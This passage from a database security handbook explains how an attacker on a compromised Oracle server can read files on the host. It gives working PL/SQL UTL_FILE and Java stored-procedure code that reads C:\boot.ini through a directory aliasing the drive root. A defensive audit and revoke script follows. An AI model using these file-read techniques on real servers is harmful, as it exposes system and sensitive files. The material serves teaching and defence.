Accessing the File System

Once a system has been compromised, one of the first things an attacker might want to do is examine the file system for useful information. Like most RDBMS, Oracle provides the tools to do this, and as such access should be restricted to the relevant packages. PL/SQL can be used to access the file system. UTL_FILE is the package used to do this, and it can be used to read and write files. While PUBLIC can execute UTL_FILE, the function that actually opens the file is FOPEN. This takes as one of its parameters the name of a directory, not a directory in the file-system sense but an Oracle directory object that has been created using the CREATE DIRECTORY command:

 CREATE OR REPLACE DIRECTORY THEDIR AS 'C:\'; 

By default, there are no directories that PUBLIC can access and PUBLIC cannot execute CREATE DIRECTORY either. This limits the risk of a low-privileged user using UTL_FILE to gain access to the file system. Of course, if a user can create a directory, then he can access the file system. The file system access is done with the privileges of the user running the main Oracle process.

 set serveroutput on
 CREATE OR REPLACE DIRECTORY THEDIR AS 'C:\';

 DECLARE
     BUFFER VARCHAR2(260);
     FD     UTL_FILE.FILE_TYPE;
 BEGIN
     -- Open C:\boot.ini for reading via the THEDIR directory object
     FD := UTL_FILE.FOPEN('THEDIR', 'boot.ini', 'r');
     DBMS_OUTPUT.ENABLE(1000000);
     -- GET_LINE raises NO_DATA_FOUND at end of file, which ends the loop
     LOOP
         UTL_FILE.GET_LINE(FD, BUFFER, 254);
         DBMS_OUTPUT.PUT_LINE(BUFFER);
     END LOOP;
 EXCEPTION
     WHEN NO_DATA_FOUND THEN
         DBMS_OUTPUT.PUT_LINE('End of file.');
         IF (UTL_FILE.IS_OPEN(FD) = TRUE) THEN
             UTL_FILE.FCLOSE(FD);
         END IF;
     WHEN OTHERS THEN
         IF (UTL_FILE.IS_OPEN(FD) = TRUE) THEN
             UTL_FILE.FCLOSE(FD);
         END IF;
 END;
 /

Run from SQL*Plus, this prints the contents of boot.ini on the server:

 [boot loader]
 timeout=30
 default=multi(0)disk(0)rdisk(0)partition(3)\WINNT
 [operating systems]
 multi(0)disk(0)rdisk(0)partition(3)\WINNT="Microsoft Windows 2000 Server" /fastdetect
 multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
 multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
 End of file.

 PL/SQL procedure successfully completed.

Java and the File System

Java can also be used to access the file system:

 CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
 import java.lang.*;
 import java.io.*;

 public class JAVAREADFILE {
     // Reads the named file line by line and writes it to the server's
     // Java output stream (redirected to DBMS_OUTPUT by dbms_java.set_output)
     public static void readfile(String filename) throws IOException
     {
         FileReader f = new FileReader(filename);
         BufferedReader fr = new BufferedReader(f);
         String text = fr.readLine();
         while (text != null)
         {
             System.out.println(text);
             text = fr.readLine();
         }
         fr.close();
     }
 }
 /

 -- PL/SQL call specification wrapping the static Java method
 CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN VARCHAR2)
 AS LANGUAGE JAVA
 NAME 'JAVAREADFILE.readfile (java.lang.String)';
 /

 exec dbms_java.set_output(2000);
 exec JAVAREADFILEPROC('C:\boot.ini')
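Both routes described above, UTL_FILE through a directory object and Java through java.io, leave traces in the data dictionary that a DBA can review. The following audit script is an added example and is not code from the book; it uses the standard DBA_TAB_PRIVS, DBA_DIRECTORIES, DBA_SYS_PRIVS and DBA_JAVA_POLICY views, and the schema name app_batch_owner in the remediation step is a constructed placeholder.

```sql
-- Added example (not from the book): audit the file-system access paths
-- discussed in this section. Run as a DBA from SQL*Plus.
SET LINESIZE 200
SET PAGESIZE 100

-- 1. Who can execute UTL_FILE? The text notes PUBLIC has this by default;
--    the exposure only becomes real when combined with a directory object.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name = 'UTL_FILE';

-- 2. Which directory objects exist, and where do they point? A directory
--    aliasing a drive root (the CREATE DIRECTORY THEDIR AS 'C:\' case above)
--    exposes the whole volume with the privileges of the Oracle process.
SELECT owner, directory_name, directory_path
  FROM dba_directories
 ORDER BY directory_name;

-- 3. Who has READ/WRITE on those directories? Directory grants are stored
--    in DBA_TAB_PRIVS with the directory name in TABLE_NAME.
SELECT p.grantee, p.table_name AS directory_name, p.privilege, d.directory_path
  FROM dba_tab_privs p
  JOIN dba_directories d ON d.directory_name = p.table_name
 WHERE p.owner = 'SYS'          -- directory objects are always owned by SYS
 ORDER BY p.grantee, p.table_name;

-- 4. Who can create directory objects at all, and so pick any path?
--    There is no plain CREATE DIRECTORY privilege; it is CREATE ANY DIRECTORY.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY DIRECTORY', 'DROP ANY DIRECTORY')
 ORDER BY grantee;

-- 5. Java file permissions bypass directory objects entirely (the
--    JAVAREADFILE route): list every java.io.FilePermission grant.
SELECT grantee, kind, name, action, enabled
  FROM dba_java_policy
 WHERE type_name = 'java.io.FilePermission'
 ORDER BY grantee, seq;

-- 6. Remediation for typical findings. app_batch_owner is a constructed
--    placeholder for the one schema that legitimately needs UTL_FILE.
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
GRANT EXECUTE ON sys.utl_file TO app_batch_owner;
DROP DIRECTORY thedir;          -- the wide-open directory from the example
```

Queries 1, 3 and 4 only show direct grants; privileges inherited through roles appear in ROLE_TAB_PRIVS and ROLE_SYS_PRIVS and should be checked the same way. Revoking PUBLIC's execute on UTL_FILE can break Oracle-supplied packages that depend on it, so test the revoke on a non-production instance first and re-grant only to the schemas that need it.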


Database Hacker's Handbook. Defending Database Servers
ISBN: 0764578014
Year: 2003
Pages: 156
